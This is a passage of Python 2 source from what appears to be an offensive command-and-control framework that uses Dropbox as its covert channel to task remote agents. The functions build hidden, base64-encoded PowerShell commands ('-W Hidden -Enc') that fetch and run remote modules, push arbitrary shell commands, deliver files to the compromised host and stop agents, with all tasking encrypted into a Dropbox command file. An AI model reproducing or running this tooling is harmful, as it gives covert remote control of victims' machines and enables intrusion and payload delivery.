def taskAgentWithRunPSModule(self,
moduleName,
moduleArgs=None,
interact=False):
# Construct the powershell code from a template, substituting palceholders with proper parameters
xorKey = Crypto.convertKey(self.statusHandler.masterKey,
outputFormat="sha256")
parameters = {
'xorKey': xorKey,
'moduleURL': self.statusHandler.publishedModuleList[moduleName]
}
poshCmd = helpers.convertFromTemplate(
parameters, cfg.defaultPath['runPSModuleTpl'])
if poshCmd == None: return
# Add module arguments if ever
if moduleArgs:
poshCmd += ";Write-Host \"-> Executing module arguments\";{}".format(
moduleArgs)
# If we want to interact with the PowerShell CLI once the module is loaded, switch to 'shell' mode
if interact:
self.taskAgentWithShell(poshCmd)
else:
task = self.statusHandler.createTask(self.agentID,
"runPSModule",
args=[moduleName, moduleArgs])
# Turn the powershell code into a suitable powershell base64 encoded one line command
base64Payload = helpers.powershellEncode(poshCmd)
# Create the final command
cmd = "powershell.exe -NoP -sta -NonI -W Hidden -Enc {}".format(
base64Payload)
# Prepare the task format, then put the task into the command file
data = "runCLI\n{}\n{}\n{}".format(task['id'], cmd,
helpers.randomString(16))
r = self.dropboxHandler.putFile(
self.statusHandler.getAgentAttribute(self.agentID,
'commandFile'),
Crypto.encryptData(data, self.statusHandler.masterKey))
if r is not None:
# Commit this task for the current agent
self.statusHandler.commitTask(task)
print helpers.color(
"[+] Agent with ID [{}] has been tasked with task ID [{}]".
format(self.agentID, task['id']))
else:
print helpers.color(
"[!] Error tasking agent with ID [{}]".format(
self.agentID))
def taskAgentWithShell(self, cmd):
# Prepare the task format, then put the task into the command file
data = "shell\n{}\n{}\n{}".format("n/a", cmd, helpers.randomString(16))
r = self.dropboxHandler.putFile(
self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'),
Crypto.encryptData(data, self.statusHandler.masterKey))
if r is not None:
print helpers.color(
"[+] Agent with ID [{}] has been tasked with shell command".
format(self.agentID))
else:
print helpers.color("[!] Error tasking agent with ID [{}]".format(
self.agentID))
def taskAgentWithSendFile(self, localFile, destinationPath):
# Creating the remote file path (used on the DropBox API server)
fileName = os.path.basename(localFile)
remoteFilePath = "/" + self.agentID + ".rsc"
# First upload the localFile to DropBox
try:
with open(localFile) as fileHandle:
print helpers.color("[*] Uploading file [{}] to [{}]".format(
localFile, remoteFilePath))
r = self.dropboxHandler.putFile(remoteFilePath,
fileHandle.read())
fileHandle.close()
if r is None:
return
except IOError:
print helpers.color(
"[!] Could not open or read file [{}]".format(localFile))
return
# Once the local file is properly uploaded, proceed with tasking the agent
# Create a task
task = self.statusHandler.createTask(self.agentID,
"sendFile",
args=[localFile, destinationPath])
# Prepare the task format, then put the task into the command file
data = "downloadFile\n{}\n{}\n{}\n{}\n{}".format(
task['id'], remoteFilePath, destinationPath, fileName,
helpers.randomString(16))
r = self.dropboxHandler.putFile(
self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'),
Crypto.encryptData(data, self.statusHandler.masterKey))
if r is not None:
# Commit this task for the current agent
self.statusHandler.commitTask(task)
print helpers.color(
"[+] Agent with ID [{}] has been tasked with task ID [{}]".
format(self.agentID, task['id']))
else:
print helpers.color("[!] Error tasking agent with ID [{}]".format(
self.agentID))
def taskAgentWithStop(self):
# Create a task
task = self.statusHandler.createTask(self.agentID, "stop")
# Prepare the task format, then put the task into the command file
data = "stop\n{}\n{}".format(task['id'], helpers.randomString(16))
r = self.dropboxHandler.putFile(
self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'),
Crypto.encryptData(data, self.statusHandler.masterKey))
if r is not None:
# Commit this task for the current agent
self.statusHandler.commitTask(task)
print helpers.color(
"[+] Agent with ID [{}] has been tasked with task ID [{}]".
format(self.agentID, task['id']))
else:
print helpers.color("[!] Error tasking agent with ID [{}]".format(
self.agentID))
